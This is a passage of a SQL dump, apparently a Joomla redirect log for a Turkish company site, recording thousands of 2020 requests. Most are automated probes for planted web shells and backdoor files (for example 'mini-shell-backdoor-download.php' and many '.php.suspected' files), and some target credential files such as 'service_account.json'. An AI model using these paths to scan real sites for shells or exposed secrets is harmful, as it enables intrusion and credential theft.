00:00:00',301),(25699,'http://3s-technologies.com.tr/tr/gfawssmvvpm.html',NULL,'','',1,0,'2020-07-17 03:11:17','0000-00-00 00:00:00',301),(25700,'http://3s-technologies.com.tr/tr/cache/new_license.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-19 08:14:59','0000-00-00 00:00:00',301),(25701,'http://3s-technologies.com.tr/tr/wp-lgoin.php',NULL,'http://site.ru','',4,0,'2020-07-19 09:05:17','0000-00-00 00:00:00',301),(25702,'http://3s-technologies.com.tr/tr/new_side.php.suspected',NULL,'http://site.ru','',6,0,'2020-07-19 09:05:38','0000-00-00 00:00:00',301),(25703,'http://3s-technologies.com.tr/tr/media-admin.php.suspected',NULL,'http://site.ru','',5,0,'2020-07-19 09:58:57','0000-00-00 00:00:00',301),(25704,'http://3s-technologies.com.tr/tr/libraries/joomla/template/content-post.php.suspected',NULL,'http://site.ru','',3,0,'2020-07-19 11:44:48','0000-00-00 00:00:00',301),(25705,'http://3s-technologies.com.tr/tr/administrator/components/com_admintools/views/acl/tmpl/ca.php',NULL,'http://site.ru','',1,0,'2020-07-19 12:06:42','0000-00-00 00:00:00',301),(25706,'http://3s-technologies.com.tr/tr/administrator/components/com_chronocontact/wizardthemes/default/elements.php',NULL,'http://site.ru','',1,0,'2020-07-19 16:36:16','0000-00-00 00:00:00',301),(25707,'http://3s-technologies.com.tr/tr/plugins/plugins.php',NULL,'http://site.ru','',2,0,'2020-07-19 17:03:20','0000-00-00 00:00:00',301),(25708,'http://3s-technologies.com.tr/tr/libraries/joomla/feed/zcysjindex.php',NULL,'http://site.ru','',2,0,'2020-07-19 17:30:37','0000-00-00 00:00:00',301),(25709,'http://3s-technologies.com.tr/tr/language/wp-info.php',NULL,'http://site.ru','',2,0,'2020-07-19 18:25:34','0000-00-00 00:00:00',301),(25710,'http://3s-technologies.com.tr/tr/cache/wp_asx.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-19 20:42:02','0000-00-00 00:00:00',301),(25711,'http://3s-technologies.com.tr/tr/templates/beez3/info.php',NULL,'http://site.ru','',2,0,'2020-07-20 00:18:20','0000-00-00 00:00:00',301),(25712,'http://3s-technologies.com.tr/tr/administrator/includes/wp-rss.php',NULL,'http://site.ru','',2,0,'2020-07-20 01:10:55','0000-00-00 00:00:00',301),(25713,'http://3s-technologies.com.tr/tr/administrator/modules/mod_login/index.php',NULL,'http://site.ru','',4,0,'2020-07-20 01:11:01','0000-00-00 00:00:00',301),(25714,'http://3s-technologies.com.tr/tr/assets/images/wp-plugins.php',NULL,'http://site.ru','',5,0,'2020-07-20 01:37:48','0000-00-00 00:00:00',301),(25715,'http://3s-technologies.com.tr/tr/hours.php',NULL,'http://site.ru','',3,0,'2020-07-20 02:57:54','0000-00-00 00:00:00',301),(25716,'http://3s-technologies.com.tr/tr/administrator/components/com_jshopping/importexport/simpleimport/form.php',NULL,'http://site.ru','',2,0,'2020-07-20 04:35:09','0000-00-00 00:00:00',301),(25717,'http://3s-technologies.com.tr/tr/language/css.php',NULL,'http://site.ru','',1,0,'2020-07-20 05:28:33','0000-00-00 00:00:00',301),(25718,'http://3s-technologies.com.tr/tr/modules/mod_search/mide.php',NULL,'http://site.ru','',3,0,'2020-07-20 06:47:37','0000-00-00 00:00:00',301),(25719,'http://3s-technologies.com.tr/tr/components/com_users/helpers/html/route.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-20 08:06:16','0000-00-00 00:00:00',301),(25720,'http://3s-technologies.com.tr/tr/components/com_contact/views/contact/tmpl/controller.php',NULL,'http://site.ru','',4,0,'2020-07-20 08:07:49','0000-00-00 00:00:00',301),(25721,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/elements.php',NULL,'http://site.ru','',2,0,'2020-07-20 09:22:34','0000-00-00 00:00:00',301),(25722,'http://3s-technologies.com.tr/tr/libraries/respectmuslims.php',NULL,'http://site.ru','',3,0,'2020-07-20 11:51:49','0000-00-00 00:00:00',301),(25723,'http://3s-technologies.com.tr/tr/feal.php.suspected',NULL,'http://site.ru','',5,0,'2020-07-20 14:48:02','0000-00-00 00:00:00',301),(25724,'http://3s-technologies.com.tr/tr/components/metadata.php',NULL,'http://site.ru','',2,0,'2020-07-20 14:48:10','0000-00-00 00:00:00',301),(25725,'http://3s-technologies.com.tr/tr/87/wp-rss.php',NULL,'http://site.ru','',1,0,'2020-07-20 15:39:06','0000-00-00 00:00:00',301),(25726,'http://3s-technologies.com.tr/tr/wp-content/plugins/background-image-cropper/new_license.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-20 17:37:09','0000-00-00 00:00:00',301),(25727,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/pattern.php',NULL,'http://site.ru','',2,0,'2020-07-20 17:37:22','0000-00-00 00:00:00',301),(25728,'http://3s-technologies.com.tr/tr/wp-content/wp-info.php',NULL,'http://site.ru','',2,0,'2020-07-20 18:03:25','0000-00-00 00:00:00',301),(25729,'http://3s-technologies.com.tr/tr/wp-content/404.php',NULL,'http://site.ru','',2,0,'2020-07-20 18:03:54','0000-00-00 00:00:00',301),(25730,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/styles.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-20 18:30:27','0000-00-00 00:00:00',301),(25731,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/styles.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-20 18:30:27','0000-00-00 00:00:00',301),(25732,'http://3s-technologies.com.tr/tr/ywdaxprdli.php',NULL,'http://site.ru','',2,0,'2020-07-20 18:32:00','0000-00-00 00:00:00',301),(25733,'http://3s-technologies.com.tr/tr/wp-content/uploads/2020/05/blackhat.php',NULL,'http://site.ru','',1,0,'2020-07-20 18:59:22','0000-00-00 00:00:00',301),(25734,'http://3s-technologies.com.tr/tr/wp-content/uploads/2019/03/content-post.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-20 19:23:32','0000-00-00 00:00:00',301),(25735,'http://3s-technologies.com.tr/tr/wp-admin/links.php',NULL,'http://site.ru','',2,0,'2020-07-20 20:43:06','0000-00-00 00:00:00',301),(25736,'http://3s-technologies.com.tr/tr/wp-content/uploads/2020/05/ups.php',NULL,'http://site.ru','',1,0,'2020-07-20 20:43:16','0000-00-00 00:00:00',301),(25737,'http://3s-technologies.com.tr/tr/wp-includes/widgets/class-wp-widget-header.php',NULL,'http://site.ru','',3,0,'2020-07-20 22:03:05','0000-00-00 00:00:00',301),(25738,'http://3s-technologies.com.tr/tr/content-pos.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-20 22:05:39','0000-00-00 00:00:00',301),(25739,'http://3s-technologies.com.tr/tr/wp-content/plugins/background-image-cropper/wp-console.php',NULL,'http://site.ru','',1,0,'2020-07-20 22:29:37','0000-00-00 00:00:00',301),(25740,'http://3s-technologies.com.tr/tr/wp-content/uploads/2020/06/doc.php',NULL,'http://site.ru','',3,0,'2020-07-20 22:29:37','0000-00-00 00:00:00',301),(25741,'http://3s-technologies.com.tr/tr/wp-includes/css/wp-pointer.php',NULL,'http://site.ru','',5,0,'2020-07-20 22:30:47','0000-00-00 00:00:00',301),(25742,'http://3s-technologies.com.tr/tr/wp-content/uploads/2020/06/wp-plugins.php',NULL,'http://site.ru','',1,0,'2020-07-20 22:56:17','0000-00-00 00:00:00',301),(25743,'http://3s-technologies.com.tr/tr/wp-content/plugins/background-image-cropper/ups.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-20 23:22:31','0000-00-00 00:00:00',301),(25744,'http://3s-technologies.com.tr/tr/cache/asdf.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-20 23:24:02','0000-00-00 00:00:00',301),(25745,'http://3s-technologies.com.tr/tr/wp-admin/includes/images.php',NULL,'http://site.ru','',2,0,'2020-07-21 01:08:46','0000-00-00 00:00:00',301),(25746,'http://3s-technologies.com.tr/tr/wp-content/uploads/2020/06/ups.php',NULL,'http://site.ru','',1,0,'2020-07-21 01:10:26','0000-00-00 00:00:00',301),(25747,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpress-importer/images.php',NULL,'http://site.ru','',2,0,'2020-07-21 01:35:44','0000-00-00 00:00:00',301),(25748,'http://3s-technologies.com.tr/tr/wp-content/uploads/2020/07/doc.php',NULL,'http://site.ru','',1,0,'2020-07-21 02:01:24','0000-00-00 00:00:00',301),(25749,'http://3s-technologies.com.tr/en/contacts/forum.php',NULL,'','',9,0,'2020-07-21 02:41:00','0000-00-00 00:00:00',301),(25750,'http://3s-technologies.com.tr/en/contacts/index.php',NULL,'','',9,0,'2020-07-21 02:41:00','0000-00-00 00:00:00',301),(25751,'http://3s-technologies.com.tr/tr/wp-content/uploads/2018/12/content-post.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-21 02:54:43','0000-00-00 00:00:00',301),(25752,'http://3s-technologies.com.tr/tr/wp-admin/user/include.php',NULL,'http://site.ru','',3,0,'2020-07-21 02:54:43','0000-00-00 00:00:00',301),(25753,'http://3s-technologies.com.tr/tr/wp-content/plugins/freedom/file.php',NULL,'http://site.ru','',1,0,'2020-07-21 03:21:29','0000-00-00 00:00:00',301),(25754,'http://3s-technologies.com.tr/tr/wp-content/themes/aemi1/footer1.php',NULL,'http://site.ru','',1,0,'2020-07-21 03:21:30','0000-00-00 00:00:00',301),(25755,'http://3s-technologies.com.tr/tr/wp-content/uploads/2020/05/doc.php',NULL,'http://site.ru','',4,0,'2020-07-21 04:19:33','0000-00-00 00:00:00',301),(25756,'http://3s-technologies.com.tr/tr/wp-content/plugins/background-image-cropper/ups.php',NULL,'http://site.ru','',9,0,'2020-07-21 04:41:06','0000-00-00 00:00:00',301),(25757,'http://3s-technologies.com.tr/tr/desk/uio.php.suspected',NULL,'http://site.ru','',3,0,'2020-07-21 05:07:06','0000-00-00 00:00:00',301),(25758,'http://3s-technologies.com.tr/tr/wp-content/uploads/2018/12/new_license.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-21 05:07:35','0000-00-00 00:00:00',301),(25759,'http://3s-technologies.com.tr/tr/wp-content/themes/404.php',NULL,'http://site.ru','',17,0,'2020-07-21 06:53:40','0000-00-00 00:00:00',301),(25760,'http://3s-technologies.com.tr/tr/wp-admin/css/common.php',NULL,'http://site.ru','',3,0,'2020-07-21 06:53:44','0000-00-00 00:00:00',301),(25761,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpress-seo/admin/import/content-post.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-21 08:14:17','0000-00-00 00:00:00',301),(25762,'http://3s-technologies.com.tr/tr/wp-admin/user/user-profile.php',NULL,'http://site.ru','',4,0,'2020-07-21 08:41:00','0000-00-00 00:00:00',301),(25763,'http://3s-technologies.com.tr/tr/wp-includes/js/include.php',NULL,'http://site.ru','',5,0,'2020-07-21 08:50:44','0000-00-00 00:00:00',301),(25764,'http://3s-technologies.com.tr/tr/wp-content/list.php',NULL,'http://site.ru','',1,0,'2020-07-21 08:53:51','0000-00-00 00:00:00',301),(25765,'http://3s-technologies.com.tr/tr//joomla/users-component/registration-form',NULL,'','',1,0,'2020-07-21 10:09:52','0000-00-00 00:00:00',301),(25766,'http://3s-technologies.com.tr/tr//index.php/user-registration',NULL,'','',1,0,'2020-07-21 10:09:53','0000-00-00 00:00:00',301),(25767,'http://3s-technologies.com.tr/tr//index.php/joomla/users-component/registration-form',NULL,'','',1,0,'2020-07-21 10:09:56','0000-00-00 00:00:00',301),(25768,'http://3s-technologies.com.tr/tr//index.php/using-joomla/extensions/components/users-component/registration-form',NULL,'','',1,0,'2020-07-21 10:09:58','0000-00-00 00:00:00',301),(25769,'http://3s-technologies.com.tr/tr//register',NULL,'','',1,0,'2020-07-21 10:09:59','0000-00-00 00:00:00',301),(25770,'http://3s-technologies.com.tr/tr//registration',NULL,'','',1,0,'2020-07-21 10:10:00','0000-00-00 00:00:00',301),(25771,'http://3s-technologies.com.tr/tr//signup',NULL,'','',1,0,'2020-07-21 10:10:00','0000-00-00 00:00:00',301),(25772,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/canonical.php',NULL,'http://site.ru','',7,0,'2020-07-21 11:43:01','0000-00-00 00:00:00',301),(25773,'http://3s-technologies.com.tr/tr/wp-content/plugins/background-image-cropper/wp-console.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-21 12:07:03','0000-00-00 00:00:00',301),(25774,'http://3s-technologies.com.tr/tr/wp-content/plugins/background-image-cropper/wp-plugins.php',NULL,'http://site.ru','',2,0,'2020-07-21 12:07:12','0000-00-00 00:00:00',301),(25775,'http://3s-technologies.com.tr/tr/wp-content/plugins/background-image-cropper/doc.php',NULL,'http://site.ru','',4,0,'2020-07-21 12:24:45','0000-00-00 00:00:00',301),(25776,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/.0aefc.php.suspected',NULL,'http://site.ru','',3,0,'2020-07-21 12:57:47','0000-00-00 00:00:00',301),(25777,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/cache/images.php',NULL,'http://site.ru','',1,0,'2020-07-21 13:46:32','0000-00-00 00:00:00',301),(25778,'http://3s-technologies.com.tr/tr/csv/smn.php',NULL,'http://site.ru','',2,0,'2020-07-21 13:47:37','0000-00-00 00:00:00',301),(25779,'http://3s-technologies.com.tr/tr/modules/mod_logon/.logout.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-21 15:02:08','0000-00-00 00:00:00',301),(25780,'http://3s-technologies.com.tr/tr/content.php.suspected',NULL,'http://site.ru','',3,0,'2020-07-21 15:28:54','0000-00-00 00:00:00',301),(25781,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/sidebar-embed.php',NULL,'http://site.ru','',1,0,'2020-07-21 15:29:03','0000-00-00 00:00:00',301),(25782,'http://3s-technologies.com.tr/tr/wp-content/plugins/background-image-cropper/new_license.php',NULL,'http://site.ru','',1,0,'2020-07-21 15:29:33','0000-00-00 00:00:00',301),(25783,'http://3s-technologies.com.tr/tr/administrator/components/com_jinc/classes/graphics/tmp-upload-images/.index.php',NULL,'http://site.ru','',1,0,'2020-07-21 16:21:48','0000-00-00 00:00:00',301),(25784,'http://3s-technologies.com.tr/tr/wp-content/uploads/2018/11/content-post.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-21 16:22:20','0000-00-00 00:00:00',301),(25785,'http://3s-technologies.com.tr/tr/wp-content/themes/cp20/content-post.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-21 16:48:19','0000-00-00 00:00:00',301),(25786,'http://3s-technologies.com.tr/tr/wp-content/themes/cp20/content-post.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-21 16:48:19','0000-00-00 00:00:00',301),(25787,'http://3s-technologies.com.tr/tr/wp-content/uploads/2020/05/ups.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-21 17:14:41','0000-00-00 00:00:00',301),(25788,'http://3s-technologies.com.tr/tr/wp-includes/requests/cookie/images.php',NULL,'http://site.ru','',1,0,'2020-07-21 17:14:51','0000-00-00 00:00:00',301),(25789,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/images.php',NULL,'http://site.ru','',2,0,'2020-07-21 17:14:55','0000-00-00 00:00:00',301),(25790,'http://3s-technologies.com.tr/tr/wp-content/themes/aemi1/404.php',NULL,'http://site.ru','',2,0,'2020-07-21 17:40:42','0000-00-00 00:00:00',301),(25791,'http://3s-technologies.com.tr/tr/wp-content/plugins/background-image-cropper/simple.php5.suspected',NULL,'http://site.ru','',1,0,'2020-07-21 17:41:25','0000-00-00 00:00:00',301),(25792,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/pcb-outline',NULL,'','',5,0,'2020-07-22 09:21:33','0000-00-00 00:00:00',301),(25793,'http://3s-technologies.com.tr/tr/wp-blog.php',NULL,'http://site.ru','',203,0,'2020-07-22 19:05:27','0000-00-00 00:00:00',301),(25794,'http://3s-technologies.com.tr/tr/administrator/com_pdf.php',NULL,'http://site.ru','',2,0,'2020-07-22 23:07:13','0000-00-00 00:00:00',301),(25795,'http://www.3s-technologies.com.tr/tr/bcnvnqophi.html',NULL,'','',1,0,'2020-07-23 03:10:35','0000-00-00 00:00:00',301),(25796,'http://3s-technologies.com.tr/tr/top.php',NULL,'http://site.ru','',5,0,'2020-07-23 06:14:32','0000-00-00 00:00:00',301),(25797,'http://3s-technologies.com.tr/tr/weblinks.php',NULL,'http://site.ru','',4,0,'2020-07-23 09:29:16','0000-00-00 00:00:00',301),(25798,'http://3s-technologies.com.tr/tr/components/com_weblinks/views/vdrh.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-23 18:04:27','0000-00-00 00:00:00',301),(25799,'http://3s-technologies.com.tr/tr/dwsonv.php.suspected',NULL,'http://site.ru','',3,0,'2020-07-23 20:13:15','0000-00-00 00:00:00',301),(25800,'http://3s-technologies.com.tr/tr/modules/mod_fxprev/libraries/doc.php',NULL,'http://site.ru','',1,0,'2020-07-23 20:38:57','0000-00-00 00:00:00',301),(25801,'http://3s-technologies.com.tr/tr/administrator/templates/bluestork/css/theme.php',NULL,'http://site.ru','',1,0,'2020-07-23 20:39:16','0000-00-00 00:00:00',301),(25802,'http://3s-technologies.com.tr/tr/freshrdp.com1.php',NULL,'http://site.ru','',2,0,'2020-07-23 21:04:58','0000-00-00 00:00:00',301),(25803,'http://3s-technologies.com.tr/tr/sl.php',NULL,'http://site.ru','',16,0,'2020-07-23 21:05:50','0000-00-00 00:00:00',301),(25804,'http://3s-technologies.com.tr/tr/c7.php',NULL,'http://site.ru','',3,0,'2020-07-23 21:32:04','0000-00-00 00:00:00',301),(25805,'http://3s-technologies.com.tr/tr/settings_auto.php',NULL,'http://site.ru','',4,0,'2020-07-23 21:57:26','0000-00-00 00:00:00',301),(25806,'http://3s-technologies.com.tr/tr/peridot/popup-pomo.php',NULL,'http://site.ru','',1,0,'2020-07-23 22:49:26','0000-00-00 00:00:00',301),(25807,'http://3s-technologies.com.tr/tr/modules/mod_widgetkit_twitter/wp-update.php',NULL,'http://site.ru','',3,0,'2020-07-23 23:15:53','0000-00-00 00:00:00',301),(25808,'http://3s-technologies.com.tr/tr/tm8q4n.php',NULL,'http://site.ru','',3,0,'2020-07-24 01:21:21','0000-00-00 00:00:00',301),(25809,'http://3s-technologies.com.tr/tr/anon.php',NULL,'http://site.ru','',13,0,'2020-07-24 03:00:51','0000-00-00 00:00:00',301),(25810,'http://3s-technologies.com.tr/tr/media.php',NULL,'http://site.ru','',56,0,'2020-07-24 03:51:15','0000-00-00 00:00:00',301),(25811,'http://3s-technologies.com.tr/tr/nwgspktmubg.html',NULL,'','',1,0,'2020-07-24 07:16:57','0000-00-00 00:00:00',301),(25812,'http://3s-technologies.com.tr/tr/libraries/joomla/template/feal.php',NULL,'http://site.ru','',1,0,'2020-07-25 01:41:46','0000-00-00 00:00:00',301),(25813,'http://3s-technologies.com.tr/tr/catchyourcheatingwife.com/wp-logout.php.suspected',NULL,'http://site.ru','',4,0,'2020-07-25 02:32:16','0000-00-00 00:00:00',301),(25814,'http://3s-technologies.com.tr/tr/wp-words.php',NULL,'http://site.ru','',2,0,'2020-07-25 04:23:34','0000-00-00 00:00:00',301),(25815,'http://3s-technologies.com.tr/tr/neter.php',NULL,'http://site.ru','',12,0,'2020-07-26 03:42:36','0000-00-00 00:00:00',301),(25816,'http://3s-technologies.com.tr/tr/mod.php',NULL,'http://site.ru','',5,0,'2020-07-26 04:03:29','0000-00-00 00:00:00',301),(25817,'http://3s-technologies.com.tr/tr/wp-log.php',NULL,'http://site.ru','',3,0,'2020-07-26 04:29:08','0000-00-00 00:00:00',301),(25818,'http://3s-technologies.com.tr/tr/templates/atomic/o.php',NULL,'http://site.ru','',3,0,'2020-07-26 04:53:56','0000-00-00 00:00:00',301),(25819,'http://3s-technologies.com.tr/tr/s.php.suspected',NULL,'http://site.ru','',3,0,'2020-07-26 05:19:06','0000-00-00 00:00:00',301),(25820,'http://3s-technologies.com.tr/tr/s.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-26 05:19:06','0000-00-00 00:00:00',301),(25821,'http://3s-technologies.com.tr/tr/anymore/popup-pomo.php',NULL,'http://site.ru','',2,0,'2020-07-26 08:12:23','0000-00-00 00:00:00',301),(25822,'http://3s-technologies.com.tr/tr/images/slider/404.php',NULL,'http://site.ru','',1,0,'2020-07-26 08:37:41','0000-00-00 00:00:00',301),(25823,'http://3s-technologies.com.tr/tr/images/slider/404.php',NULL,'http://site.ru','',1,0,'2020-07-26 08:37:41','0000-00-00 00:00:00',301),(25824,'http://3s-technologies.com.tr/tr/telsip.mx/docindex.php',NULL,'http://site.ru','',1,0,'2020-07-26 09:27:57','0000-00-00 00:00:00',301),(25825,'http://3s-technologies.com.tr/tr/wp-linfo.php',NULL,'http://site.ru','',2,0,'2020-07-26 22:02:00','0000-00-00 00:00:00',301),(25826,'http://3s-technologies.com.tr/tr/wp-linfo.php',NULL,'http://site.ru','',1,0,'2020-07-26 22:02:00','0000-00-00 00:00:00',301),(25827,'http://3s-technologies.com.tr/tr/newsfeter.php.suspected',NULL,'http://site.ru','',4,0,'2020-07-27 02:16:23','0000-00-00 00:00:00',301),(25828,'http://3s-technologies.com.tr/tr/header.php',NULL,'http://site.ru','',48,0,'2020-07-27 05:17:17','0000-00-00 00:00:00',301),(25829,'http://3s-technologies.com.tr/tr/wp-version.php',NULL,'http://site.ru','',3,0,'2020-07-27 07:52:35','0000-00-00 00:00:00',301),(25830,'http://3s-technologies.com.tr/tr/backup/mobile.php',NULL,'http://site.ru','',2,0,'2020-07-27 12:03:34','0000-00-00 00:00:00',301),(25831,'http://3s-technologies.com.tr/tr/administrator/components/com_ajax/theme.php',NULL,'http://site.ru','',2,0,'2020-07-27 15:20:09','0000-00-00 00:00:00',301),(25832,'http://3s-technologies.com.tr/tr/config.php.suspected',NULL,'http://site.ru','',4,0,'2020-07-27 18:40:04','0000-00-00 00:00:00',301),(25833,'http://3s-technologies.com.tr/tr/m0m.php',NULL,'http://site.ru','',3,0,'2020-07-27 18:40:12','0000-00-00 00:00:00',301),(25834,'http://3s-technologies.com.tr/tr/backup/meuhy.php',NULL,'http://site.ru','',2,0,'2020-07-27 19:28:58','0000-00-00 00:00:00',301),(25835,'http://3s-technologies.com.tr/tr/penguin/popup-pomo.php',NULL,'http://site.ru','',2,0,'2020-07-27 20:41:17','0000-00-00 00:00:00',301),(25836,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/hakk-m-zda',NULL,'','',2,0,'2020-07-28 02:23:55','0000-00-00 00:00:00',301),(25837,'http://mail.3s-technologies.com.tr/tr/service_account.json',NULL,'','',1,0,'2020-07-28 02:27:49','0000-00-00 00:00:00',301),(25838,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/views/profile/tmpl/class.php',NULL,'http://site.ru','',3,0,'2020-07-28 04:47:12','0000-00-00 00:00:00',301),(25839,'http://3s-technologies.com.tr/tr/old/mhbgf.php',NULL,'http://site.ru','',2,0,'2020-07-28 05:12:56','0000-00-00 00:00:00',301),(25840,'http://3s-technologies.com.tr/tr/valent/popup-pomo.php',NULL,'http://site.ru','',2,0,'2020-07-28 06:04:01','0000-00-00 00:00:00',301),(25841,'http://3s-technologies.com.tr/tr/wp-xmlrpc.php',NULL,'http://site.ru','',3,0,'2020-07-28 07:51:37','0000-00-00 00:00:00',301),(25842,'http://3s-technologies.com.tr/tr/wp-imags.php',NULL,'http://site.ru','',5,0,'2020-07-28 10:54:39','0000-00-00 00:00:00',301),(25843,'http://3s-technologies.com.tr/tr/wp-active.php',NULL,'http://site.ru','',2,0,'2020-07-28 12:16:05','0000-00-00 00:00:00',301),(25844,'http://3s-technologies.com.tr/tr/meuhy.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-28 14:12:39','0000-00-00 00:00:00',301),(25845,'http://3s-technologies.com.tr/tr/rtf557lt/mini-shell-backdoor-download.php',NULL,'http://site.ru','',2,0,'2020-07-28 15:20:07','0000-00-00 00:00:00',301),(25846,'http://3s-technologies.com.tr/tr/backup/ocp.php',NULL,'http://site.ru','',8,0,'2020-07-28 15:47:07','0000-00-00 00:00:00',301),(25847,'http://3s-technologies.com.tr/tr/indexe.php',NULL,'http://site.ru','',3,0,'2020-07-28 15:47:37','0000-00-00 00:00:00',301),(25848,'http://3s-technologies.com.tr/tr/tmp/wp.php',NULL,'http://site.ru','',1,0,'2020-07-28 16:15:15','0000-00-00 00:00:00',301),(25849,'http://3s-technologies.com.tr/tr/components/com_content/controllers/green.php',NULL,'http://site.ru','',1,0,'2020-07-28 17:10:09','0000-00-00 00:00:00',301),(25850,'http://mail.3s-technologies.com.tr/tr/settings.py',NULL,'','',1,0,'2020-07-28 20:06:08','0000-00-00 00:00:00',301),(25851,'http://3s-technologies.com.tr/tr/modules/sitemps.php',NULL,'http://site.ru','',3,0,'2020-07-29 04:46:04','0000-00-00 00:00:00',301),(25852,'http://3s-technologies.com.tr/tr/administrator/manifests/libraries/wp-aespa.php',NULL,'http://site.ru','',2,0,'2020-07-29 05:14:44','0000-00-00 00:00:00',301),(25853,'http://3s-technologies.com.tr/tr/administrator/sitemps.php',NULL,'http://site.ru','',2,0,'2020-07-29 06:10:11','0000-00-00 00:00:00',301),(25854,'http://3s-technologies.com.tr/tr/isu.php',NULL,'http://site.ru','',1,0,'2020-07-29 07:06:49','0000-00-00 00:00:00',301),(25855,'http://3s-technologies.com.tr/tr/templates/protostar/ups.php',NULL,'http://site.ru','',2,0,'2020-07-29 07:07:25','0000-00-00 00:00:00',301),(25856,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer',NULL,'','',4,0,'2020-07-29 10:53:39','0000-00-00 00:00:00',301),(25857,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/kester',NULL,'','',2,0,'2020-07-29 11:40:53','0000-00-00 00:00:00',301),(25858,'http://3s-technologies.com.tr/tr/payload3.php',NULL,'http://site.ru','',2,0,'2020-07-29 19:54:23','0000-00-00 00:00:00',301),(25859,'http://3s-technologies.com.tr/tr/libraries/simplepie/wp-aespa.php',NULL,'http://site.ru','',2,0,'2020-07-29 21:51:47','0000-00-00 00:00:00',301),(25860,'http://www.3s-technologies.com.tr/index.php/en/xmlrpc.php',NULL,'http://www.3s-technologies.com.tr/index.php/en/xmlrpc.php','',1,0,'2020-07-30 16:32:53','0000-00-00 00:00:00',301),(25861,'http://www.3s-technologies.com.tr/index.php/en/products/xmlrpc.php',NULL,'http://www.3s-technologies.com.tr/index.php/en/products/xmlrpc.php','',1,0,'2020-07-30 16:32:54','0000-00-00 00:00:00',301),(25862,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&itemid=144&lang=tr',NULL,'','',2,0,'2020-07-30 18:33:57','0000-00-00 00:00:00',301),(25863,'http://www.3s-technologies.com.tr/joomla/index.php?view=article&catid=34:genel&id=45:kalite&tmpl=component&print=1&layout=default&page=&option=com_content&itemid=29&lang=tr',NULL,'','',2,0,'2020-07-30 18:35:53','0000-00-00 00:00:00',301),(25864,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/screen-printer',NULL,'','',3,0,'2020-07-30 21:03:58','0000-00-00 00:00:00',301),(25865,'http://3s-technologies.com.tr/en/xattacker.php?x=attacker',NULL,'','',2,0,'2020-08-01 07:02:06','0000-00-00 00:00:00',301),(25866,'http://3s-technologies.com.tr/tr/controller-tmp.php',NULL,'http://site.ru','',6,0,'2020-08-02 07:04:21','0000-00-00 00:00:00',301),(25867,'http://3s-technologies.com.tr/tr/cache/xnikx68min.php',NULL,'http://site.ru','',3,0,'2020-08-02 07:29:40','0000-00-00 00:00:00',301),(25868,'http://3s-technologies.com.tr/tr/cache/data.php',NULL,'http://site.ru','',2,0,'2020-08-02 07:30:23','0000-00-00 00:00:00',301),(25869,'http://3s-technologies.com.tr/tr/tmp/mod_config.php',NULL,'http://site.ru','',1,0,'2020-08-02 08:22:47','0000-00-00 00:00:00',301),(25870,'http://3s-technologies.com.tr/tr/hader.php',NULL,'http://site.ru','',2,0,'2020-08-02 08:22:51','0000-00-00 00:00:00',301),(25871,'http://3s-technologies.com.tr/tr/templates/atomic/html.php',NULL,'http://site.ru','',1,0,'2020-08-02 08:23:44','0000-00-00 00:00:00',301),(25872,'http://3s-technologies.com.tr/tr/includes/indeh.php',NULL,'http://site.ru','',3,0,'2020-08-02 08:49:46','0000-00-00 00:00:00',301),(25873,'http://3s-technologies.com.tr/tr/111index.php',NULL,'http://site.ru','',4,0,'2020-08-02 09:16:22','0000-00-00 00:00:00',301),(25874,'http://3s-technologies.com.tr/tr/wp-rss.php',NULL,'http://site.ru','',4,0,'2020-08-02 09:17:04','0000-00-00 00:00:00',301),(25875,'http://3s-technologies.com.tr/tr/ict.php',NULL,'http://site.ru','',3,0,'2020-08-02 09:43:33','0000-00-00 00:00:00',301),(25876,'http://3s-technologies.com.tr/tr/core/fckeditor/editor/filemanager/connectors/php/upload.php?type=media',NULL,'','',1,0,'2020-08-02 10:13:21','0000-00-00 00:00:00',301),(25877,'http://3s-technologies.com.tr/tr/index.php/component/users',NULL,'','',1,0,'2020-08-02 10:13:26','0000-00-00 00:00:00',301),(25878,'http://3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch2121121121212.1',NULL,'','',3,0,'2020-08-03 14:10:54','0000-00-00 00:00:00',301),(25879,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/images/m_images/pdf_button.png',NULL,'','',1,0,'2020-08-03 21:33:53','0000-00-00 